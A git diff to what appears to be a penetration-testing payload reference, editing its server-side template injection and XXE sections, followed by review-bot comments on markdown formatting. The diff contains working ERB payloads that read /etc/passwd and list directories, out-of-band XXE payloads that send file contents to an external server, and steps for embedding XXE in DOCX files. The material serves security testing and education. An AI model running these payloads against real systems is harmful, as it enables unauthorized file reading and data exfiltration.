diff --git a/Server Side Template injections/README.md b/Server Side Template injections/README.md index 7a43ed5..153b320 100644 --- a/Server Side Template injections/README.md +++ b/Server Side Template injections/README.md @@ -15,16 +15,22 @@ python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment ### Basic injection -```python +```ruby <%= 7 * 7 %> ``` ### Retrieve /etc/passwd -```python +```ruby <%= File.open('/etc/passwd').read %> ``` +### List files and directories + +```ruby +<%= Dir.entries('/') %> +``` + ## Java ### Java - Basic injection @@ -228,4 +234,5 @@ $eval('1+1') * [Gist - Server-Side Template Injection - RCE For the Modern WebApp by James Kettle (PortSwigger)](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98) * [PDF - Server-Side Template Injection: RCE for the modern webapp - @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf) * [VelocityServlet Expression Language injection](https://magicbluech.github.io/2017/12/02/VelocityServlet-Expression-language-Injection/) -* [Cheatsheet - Flask & Jinja2 SSTI - Sep 3, 2018 • By phosphore](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti) \ No newline at end of file +* [Cheatsheet - Flask & Jinja2 SSTI - Sep 3, 2018 • By phosphore](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti) +* [RITSEC CTF 2018 WriteUp (Web) - Aj Dumanhug](https://medium.com/@ajdumanhug/ritsec-ctf-2018-writeup-web-72a0e5aa01ad) \ No newline at end of file diff --git a/XXE injection/README.md b/XXE injection/README.md index a1cb8c3..8079471 100644 --- a/XXE injection/README.md +++ b/XXE injection/README.md @@ -101,9 +101,9 @@ h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g] i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h] ``` -## Blind XXE +## Blind XXE - Out of Band -Blind XXE +### Blind XXE ```xml <?xml version="1.0" encoding="ISO-8859-1"?> 
@@ -116,7 +116,7 @@ Blind XXE <foo>&callhome;</foo> ``` -XXE OOB Attack (Yunusov, 2013) +### XXE OOB Attack (Yunusov, 2013) ```xml <?xml version="1.0" encoding="utf-8"?> @@ -129,7 +129,7 @@ File stored on http://publicServer.com/parameterEntity_oob.dtd %all; ``` -XXE OOB with DTD and PHP filter +### XXE OOB with DTD and PHP filter ```xml <?xml version="1.0" ?> @@ -146,15 +146,42 @@ File stored on http://127.0.0.1/dtd.xml <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1/dtd.xml?%data;'>"> ``` -XXE Inside SOAP +### XXE Inside SOAP ```xml <soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body> ``` +### XXE Inside DOCX file + +Format of an Open XML file (inject the payload in any .xml file): + +- /_rels/.rels +- [Content_Types].xml +- Default Main Document Part + - /word/document.xml + - /ppt/presentation.xml + - /xl/workbook.xml + +Then update the file `zip -u xxe.docx [Content_Types].xml` + +Tool : https://github.com/BuffaloWill/oxml_xxe + +```xml +DOCX/XLSX/PPTX +ODT/ODG/ODP/ODS +SVG +XML +PDF (experimental) +JPG (experimental) +GIF (experimental) +``` + ## Thanks to * [XML External Entity (XXE) Processing - OWASP](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing) * [Detecting and exploiting XXE in SAML Interfaces - Von Christian Mainka](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html) * [staaldraad - XXE payloads](https://gist.github.com/staaldraad/01415b990939494879b4) * [mgeeky - XML attacks](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870) +* [Exploiting xxe in file upload functionality - BLACKHAT WEBCAST- 11/19/15 Will Vandevanter - @_will_is_](https://www.blackhat.com/docs/webcast/11192015-exploiting-xml-entity-vulnerabilities-in-file-parsing-functionality.pdf) +* [XXE ALL THE THINGS!!! (including Apple iOS's Office Viewer)](http://en.hackdig.com/08/28075.htm) \ No newline at end of file
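Review bot: the `python` to `ruby` fence change on the two existing ERB payloads is correct and the new `### List files and directories` block follows the same pattern; since all three are ERB templates (`<%= ... %>` delimiters with Ruby inside), tagging them `erb` instead of `ruby` would highlight the delimiters as well as the expression and is the more accurate label.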
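Review bot: the SSTI references hunk still ends with `\ No newline at end of file`, which is why the unchanged phosphore cheatsheet line shows up as removed and re-added just to append the RITSEC entry; end the file with a newline after the new link so future additions touch only the line they add.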
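Review bot: promoting the bare `Blind XXE` sentence to `### Blind XXE` under the new `## Blind XXE - Out of Band` heading fixes the heading hierarchy, but the section now starts directly with a code block; one introductory line saying what the following subsections have in common (the parser is made to fetch a URL, so the result is observed on the server hosting that URL rather than in the application's response) would tell readers why these payloads are grouped as out of band and what outbound traffic a defender should be logging to detect them.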
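Review bot: the fenced block after `Tool : https://github.com/BuffaloWill/oxml_xxe` is tagged `xml` but contains a plain list of the file types the tool supports (`DOCX/XLSX/PPTX`, `ODT/ODG/ODP/ODS`, `SVG`, `XML`, ...), not XML; render it as a bullet list introduced by something like "Formats supported by oxml_xxe:" so it is not mistaken for a payload. Two smaller points in the same section: `Tool :` should use the markdown link style the rest of the file uses, and `zip -u xxe.docx [Content_Types].xml` should quote the file name, since `[...]` is a shell glob pattern, and state that it is run from the directory where the archive was unpacked. The XXE references added at the end also leave the file without a trailing newline.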